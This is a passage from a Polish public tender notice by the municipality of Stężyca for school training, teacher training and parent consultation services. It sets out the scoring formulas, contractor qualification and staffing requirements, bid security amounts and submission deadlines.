class="mb-0">80511000-9 - Usługi szkolenia personelu</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-03-01 do 2027-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert będzie przeprowadzona według poniższego algorytmu (wzoru):<br/>Kryterium nr 1 Cena[C] 60 % (max 60 pkt.)<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium cena, gdzie punkty wyliczane są wg wzoru:<br/>C=CMIN/CB x 0,60 x 100 pkt <br/>CMIN – najniższa cena spośród ofert niepodlegających odrzuceniu<br/> CB – cena oferty badanej<br/>Kryterium nr 2 S – klauzule społeczne [S] 40% (max. 40 pkt)<br/>S - liczba punktów przyznanych ocenianej ofercie w kryterium „klauzule społeczne” gdzie punkty wyliczane są wg następujących zasad:<br/>Wykonawca, który zatrudnia minimum 1 osobę należącą do co najmniej jednej z poniższych grup:<br/>1)	osoba z niepełnosprawnościami posiadająca orzeczenie o niepełnosprawności (wg ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych);<br/>2)	osoba bezrobotna w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy.<br/>W ramach niniejszego kryterium Wykonawca uzyska maksymalnie 40 punktów. W przypadku braku możliwości weryfikacji podanych informacji – brak właściwego zaznaczenia - Zamawiający uzna klauzulę za niespełnioną i Wykonawca otrzyma 0 pkt. Zamawiający dokona weryfikacji spełniania powyższego kryterium na podstawie oświadczenia Wykonawcy, będącego integralną częścią Formularza Ofertowego. Zamawiający zastrzega sobie prawo do weryfikacji powyższego kryterium przez cały okres trwania realizacji zamówienia. <br/>Pozostałe warunki spełniania kryterium w zakresie zatrudnienia co najmniej 1 osoby z wyżej wymienionych grupy znajdują się w SWZ.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych przez Zamawiającego kryteriach.<br/>PŁ = C + S <br/>gdzie <br/>PŁ - łączna liczba punktów<br/>C - liczba punktów w kryterium ceny<br/>S – klauzule społeczne <br/>4.	Liczba punktów jest liczona z dokładnością do dwóch miejsc po przecinku, zaokrągleń dokonuje się w ten sposób, że końcówki poniżej 0,005 pkt pomija się, a końcówki 0,005 pkt i wyższe zaokrągla się o 0,01 pkt. <br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o bilans ceny oraz kryterium jakościowego, odnoszącego się do przedmiotu zamówienia.<br/>6.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny oraz kryterium jakościowego oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Oferty dodatkowe ocenia się według tych samych zasad.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III – konsultacje dla rodziców/ opiekunów prawnych – Indywidualne spotkania/konsultacje z rodzicami/opiekunami prawnymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80340000-9 - Usługi edukacji specjalnej</p> <p class="mb-0">85312320-8 - Usługi doradztwa</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-03-01 do 2027-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert będzie przeprowadzona według poniższego algorytmu (wzoru):<br/>Kryterium nr 1 Cena[C] 60 % (max 60 pkt.)<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium cena, gdzie punkty wyliczane są wg wzoru:<br/>C=CMIN/CB x 0,60 x 100 pkt <br/>CMIN – najniższa cena spośród ofert niepodlegających odrzuceniu<br/> CB – cena oferty badanej<br/>Kryterium nr 2 S – klauzule społeczne [S] 40% (max. 40 pkt)<br/>S - liczba punktów przyznanych ocenianej ofercie w kryterium „klauzule społeczne” gdzie punkty wyliczane są wg następujących zasad:<br/>Wykonawca, który zatrudnia minimum 1 osobę należącą do co najmniej jednej z poniższych grup:<br/>1)	osoba z niepełnosprawnościami posiadająca orzeczenie o niepełnosprawności (wg ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych);<br/>2)	osoba bezrobotna w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy.<br/>W ramach niniejszego kryterium Wykonawca uzyska maksymalnie 40 punktów. W przypadku braku możliwości weryfikacji podanych informacji – brak właściwego zaznaczenia - Zamawiający uzna klauzulę za niespełnioną i Wykonawca otrzyma 0 pkt. Zamawiający dokona weryfikacji spełniania powyższego kryterium na podstawie oświadczenia Wykonawcy, będącego integralną częścią Formularza Ofertowego. Zamawiający zastrzega sobie prawo do weryfikacji powyższego kryterium przez cały okres trwania realizacji zamówienia. <br/>Pozostałe warunki spełniania kryterium w zakresie zatrudnienia co najmniej 1 osoby z wyżej wymienionych grupy znajdują się w SWZ.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych przez Zamawiającego kryteriach.<br/>PŁ = C + S <br/>gdzie <br/>PŁ - łączna liczba punktów<br/>C - liczba punktów w kryterium ceny<br/>S – klauzule społeczne <br/>4.	Liczba punktów jest liczona z dokładnością do dwóch miejsc po przecinku, zaokrągleń dokonuje się w ten sposób, że końcówki poniżej 0,005 pkt pomija się, a końcówki 0,005 pkt i wyższe zaokrągla się o 0,01 pkt. <br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o bilans ceny oraz kryterium jakościowego, odnoszącego się do przedmiotu zamówienia.<br/>6.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny oraz kryterium jakościowego oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Oferty dodatkowe ocenia się według tych samych zasad.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: <br/>Część II<br/>Warunek zostanie spełniony jeżeli Wykonawca posiada akredytację Kuratorium Oświaty dla Wykonawcy w zakresie Doskonalenia Nauczycieli oraz wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewodę właściwego dla siedziby Wykonawcy.<br/>1.3	sytuacji ekonomicznej lub finansowej: Zamawiający nie precyzuje warunku w tym zakresie.<br/>1.4	zdolności technicznej lub zawodowej: Warunek zostanie spełniony, jeżeli w złożonych dokumentach i oświadczeniach Wykonawca jednoznacznie wykaże, że: <br/>Część I <br/>wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę w zakresie prowadzenia zajęć dla dzieci w wieku szkolnym, o wartości co najmniej 400 000,00 PLN brutto.<br/>Zamawiający dopuszcza wykonanie 2 usług w zakresie prowadzenia zajęć dla dzieci w wieku szkolnym, w tym dla dzieci ze specjalnymi potrzebami o wartości o łącznej wartości 400 000,00 PLN.<br/><br/>Część II<br/>wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę szkolenia nauczycieli, o wartości co najmniej 50 000,00 PLN brutto. Zamawiający dopuszcza wykonanie maksymalnie 3 usług szkolenia nauczycieli o łącznej wartości 120 000,00 PLN.<br/><br/>Część III<br/>wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę realizacji wsparcia dla rodziców/ opiekunów prawnych np. pedagogizacje, Szkoła dla Rodzica, konsultacje, doradztwo, diagnostyka potencjału rodzin, o wartości co najmniej 20 000,00 PLN brutto.<br/>Zamawiający dopuszcza wykonanie maksymalnie 5 usług realizacji wsparcia dla rodziców/ opiekunów prawnych np. pedagogizacje, Szkoła dla Rodzica, konsultacje, doradztwo, diagnostyka potencjału rodzin o łącznej wartości 20 000,00 PLN.<br/><br/>Wykonawca zobowiązany jest do złożenia dowodów określających czy te usługi zostały wykonane należycie, w szczególności czy zostały wykonane zgodnie z normami i prawidłowo ukończone. Ocena spełnienia warunku nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy „Wykaz usług” (Załącznik Nr 6 do SWZ) oraz dokumentów załączonych do „Wykazu usług”.<br/><br/>dysponuje lub będzie dysponował co najmniej:<br/>Część I<br/>	dwiema osobami, które skieruje do realizacji zajęć komputerowych posiadającymi min. wykształcenie wyższe kierunkowe, doświadczenie spójne z tematyką prowadzenia zajęć, min. 200h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>	jedną osobą, którą skieruje do realizacji warsztatów w zakresie kodowania i programowania posiadającą min. wykształcenie wyższe kierunkowe, doświadczenie spójne z tematyką prowadzenia zajęć, min. 200h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>	jedną osobą, którą skieruje do realizacji zajęć matematycznych posiadającą min. wykształcenie wyższe kierunkowe, doświadczenie spójne z tematyką prowadzenia zajęć, min. 100h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>	jedną osobą, którą skieruje do realizacji zajęć naukowo-technicznych posiadającą min. wykształcenie wyższe kierunkowe, doświadczenie spójne z tematyką prowadzenia zajęć, min. 200h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>	jedną osobą, którą skieruje do realizacji zajęć przyrodniczych posiadającą min. wykształcenie wyższe kierunkowe, doświadczenie spójne z tematyką prowadzenia zajęć, min. 200h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>	jedną osobą, którą skieruje do realizacji zajęć fizycznych posiadającą min. wykształcenie wyższe kierunkowe, doświadczenie spójne z tematyką prowadzenia zajęć, min. 150h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>	dwiema osobami, które skieruje do realizacji zajęć z języka kaszubskiego posiadające min. wykształcenie wyższe kierunkowe a ponadto zna język kaszubski, w którym naucza lub prowadzi zajęcia. Znajomość języka kaszubskiego potwierdza się stosownym dyplomem lub orzeczeniem wydanym przez właściwe stowarzyszenie mniejszościowe lub etniczne lub inne równoważne dokumenty potwierdzające prawo do nauczania języka kaszubskiego, doświadczenie spójne z tematyką prowadzenia zajęć, min. 200h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>	jedną osobą, którą skieruje do realizacji zajęć z żeglarstwa posiadającą min. wykształcenie wyższe a ponadto jest certyfikowanym instruktorem żeglarstwa lub posiada inne równoważne dokumenty potwierdzające prawo do prowadzenia zajęć z żeglarstwa, doświadczenie spójne z tematyką prowadzenia zajęć, min. 50h w prowadzeniu szkoleń z żeglarstwa z uczniami w wieku szkolnym;<br/>	jednym doradcą zawodowym, którego skieruje do realizacji zajęć, posiadającego min. wykształcenie wyższe (w tym studia podyplomowe), doświadczenie spójne z tematyką prowadzonych zajęć (min. 100 h) w prowadzeniu zajęć z dziećmi w wieku szkolnym;<br/>	jedną osobą, którą skieruje do realizacji zajęć z przedsiębiorczości posiadającą min. wykształcenie wyższe kierunkowe, doświadczenie spójne z tematyką prowadzenia zajęć, min. 150h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>	dwoma psychologami, których skieruje do realizacji zajęć, posiadających min. wykształcenie wyższe - studia podyplomowe, doświadczenie (min. 200 h) w prowadzeniu zajęć z dziećmi w wieku szkolnym;<br/>	jednym logopedą, którego skieruje do realizacji zamówienia do realizacji zajęć, posiadającego min. wykształcenie wyższe, uprawnienia do prowadzenia zajęć logopedycznych, doświadczenie (min. 200 h) w prowadzeniu zajęć z dziećmi w wieku szkolnym;<br/>	dwoma fizjoterapeutami, których skieruje do realizacji zajęć, posiadających min. wykształcenie wyższe, doświadczenie (min. 200 h) w prowadzeniu zajęć z dziećmi w wieku szkolnym;<br/>	jedną osobą, którą skieruje do realizacji zajęć z języka polskiego posiadającą min. wykształcenie wyższe o kierunku pedagogika a ponadto kierunkowe do nauczania języka polskiego, doświadczenie spójne z tematyką prowadzenia zajęć, min. 50 h w prowadzeniu zajęć z uczniami w wieku szkolnym;<br/>Część II<br/>	jedną osobą, którą skieruje do realizacji szkolenia w zakresie indywidualizacji pracy z uczniem posiadającą min. wykształcenie wyższe i/lub kursy zawodowe pokrewne z tematyką zajęć lub inne dokumenty równoważne potwierdzające prawo do realizacji szkolenia, doświadczenie w prowadzeniu kursów/szkoleń dla nauczycieli (min. 8 h);<br/>	jedną osobą, którą skieruje do realizacji szkolenia w zakresie sztucznej inteligencji posiadającą min. wykształcenie wyższe i/lub kursy zawodowe pokrewne z tematyką zajęć lub inne dokumenty równoważne potwierdzające prawo do realizacji szkolenia, doświadczenie w prowadzeniu kursów/szkoleń dla nauczycieli (min. 10 h);<br/>	jedną osobą, którą skieruje do realizacji szkolenia w zakresie pracy z uczniem ze specjalnymi potrzebami posiadającą min. wykształcenie wyższe i/lub kursy zawodowe pokrewne z tematyką zajęć lub inne dokumenty równoważne potwierdzające prawo do realizacji szkolenia, doświadczenie w prowadzeniu kursów/szkoleń dla nauczycieli (min. 8 h);<br/>	jedną osobą, którą skieruje do realizacji szkolenia w zakresie pracy z uczniem z doświadczeniem migracji posiadającą min. wykształcenie wyższe i/lub kursy zawodowe pokrewne z tematyką zajęć lub inne dokumenty równoważne potwierdzające prawo do realizacji szkolenia, doświadczenie w prowadzeniu kursów/szkoleń dla nauczycieli (min. 10 h);<br/>	jedną osobą, którą skieruje do realizacji szkolenia w zakresie alternatywnych metod komunikowania się posiadającą min. wykształcenie wyższe i/lub kursy zawodowe pokrewne z tematyką zajęć lub inne dokumenty równoważne potwierdzające prawo do realizacji szkolenia, doświadczenie w prowadzeniu kursów/szkoleń dla nauczycieli (min. 10 h);<br/>	jedną osobą, którą skieruje do realizacji szkolenia w zakresie radzenia sobie ze stresem i technik relaksacyjnych posiadającą min. wykształcenie wyższe i/lub kursy zawodowe pokrewne z tematyką zajęć lub inne dokumenty równoważne potwierdzające prawo do realizacji szkolenia, doświadczenie w prowadzeniu kursów/szkoleń dla nauczycieli (min. 15h);<br/>	jedną osobą, którą skieruje do realizacji szkolenia w zakresie równości płci i przeciwdziałania stereotypom, posiadającą min. wykształcenie wyższe i/lub kursy zawodowe pokrewne z tematyką zajęć lub inne dokumenty równoważne potwierdzające prawo do realizacji szkolenia, doświadczenie w prowadzeniu kursów/szkoleń dla nauczycieli (min. 10 h);<br/><br/>Część III<br/>	jednego psychologa, którego skieruje do realizacji indywidualnych spotkań z rodzicami, posiadającego min. wykształcenie wyższe - studia podyplomowe, co najmniej dwuletnie doświadczenie w zawodzie psychologa;<br/>	jednego pedagoga specjalnego, którego skieruje do realizacji indywidualnych spotkań z rodzicami, posiadającego min. wykształcenie wyższe - studia podyplomowe, co najmniej dwuletnie doświadczenie w specjalności pedagoga specjalnego;<br/>	jednego dietetyka, którego skieruje do realizacji indywidualnych spotkań z rodzicami, posiadającego min. wykształcenie wyższe - studia podyplomowe, co najmniej dwuletnie doświadczenie w zawodzie dietetyka. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 273 ustawy, wskazanych poniżej:<br/>e)	informację o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt 5 Pzp. Wzór dokumentu stanowi załącznik nr 4 do SWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.<br/>f)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 pkt 3 ustawy, art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6 ustawy oraz art. 7 ust. 1 ustawy dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Wzór dokumentu stanowi załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 273 ustawy, wskazanych poniżej:<br/>a)	dokument potwierdzający akredytację Kuratorium Oświaty dla Wykonawcy w zakresie Doskonalenia Nauczycieli;.<br/>b)	wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewodę właściwego dla siedziby Wykonawcy.<br/>c)	wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat lub wykonywanych przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane;<br/>d)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi zasobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości: <br/>Część I	zajęcia i warsztaty poza edukacją formalną dla uczniów 10 000,00 zł (dziesięć tysięcy złotych 00/100)<br/>Część II	szkolenia skierowane do kadry szkół	1 000,00 zł (jeden tysiąc złotych 00/100)<br/>Część III	konsultacje dla rodziców/ opiekunów prawnych	500,00 zł (pięćset złotych 00/100)<br/><br/>2.	Wadium może być wniesione w:<br/>1)	pieniądzu; <br/>2)	gwarancjach ubezpieczeniowych;<br/>3)	gwarancjach bankowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 310, 836, 1572.) <br/>3.	Wadium w formie pieniądza należy wnieść przelewem na konto w Bank Spółdzielczy w Kościerzynie, nr konta: 62 8328 0007 2001 0008 3957 0003, z dopiskiem na przelewie: „Wadium w postępowaniu 271.20.2025 Usługi polegające na realizacji usług szkoleniowych, doradczych oraz specjalistycznych, edukacyjno-społecznych w szkołach podstawowych Gminy Stężyca część ……..(numer części)”.<br/>4.	Wniesienie wadium:<br/>1)	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w rozdz. XXIII. 3 niniejszej SWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>2)	Jeżeli wadium wnoszone jest w formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>5.	W treści gwarancji/poręczenia winno wynikać bezwarunkowe na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona. <br/>7.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wspólne ubieganie się o udzielenie zamówienia. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia składając wspólną ofertę, w takim przypadku ponoszą solidarną odpowiedzialność za wykonanie umowy. <br/>2.	Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia mogą być:<br/>1)	spółka cywilna – w rozumieniu przepisów art. 860-875 KC,<br/>2)	Wykonawcy, którzy zawarli porozumienie w celu wspólnego ubiegania się o udzielenie zamówienia, niebędący spółką cywilną w rozumieniu przepisów KC np.: tak zwane „konsorcjum” dwóch lub więcej Wykonawców.<br/>3.	Wykonawcy, którzy wspólnie ubiegają się o zamówienie, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego, albo reprezentowania w postępowaniu i zawarcia umowy. <br/>4.	Każdy Wykonawca, spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składa dokumenty, które Zamawiający określił w zakresie spełnienia warunków udziału w postępowaniu, o których mowa w art. 273 ust. 1 Pzp. Wykonawcy wspólnie ubiegający się o zamówienie składają dokumenty w taki sposób, by przy ich ocenie wspólnie spełniali ww. warunki. W przypadku opisu warunków udziału w postępowaniu, w zakresie określonym w art. 273 ust. 1 Pzp. wystarczającym jest, jeśli jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego wykaże spełnienie określonego warunku, powyższe oznacza, że warunek spełnia w całości konsorcjum Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy stanowią załącznik nr 3 do SWZ. <br/>2.	Zmiany istotne postanowień zawartej umowy w stosunku do treści złożonej przez Wykonawcę oferty, która została wybrana jako oferta najkorzystniejsza, są możliwe w zakresie uregulowanym w art. 454-455 ustawy PZP oraz określonym we wzoru umowy. Istotna zmiana postanowień zawartej umowy wymaga formy pisemnej (aneks do umowy) pod rygorem nieważności i wymaga akceptacji każdej ze stron umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-28 06:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gminastezyca w myśl Ustawy na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-28 06:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-02-26</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 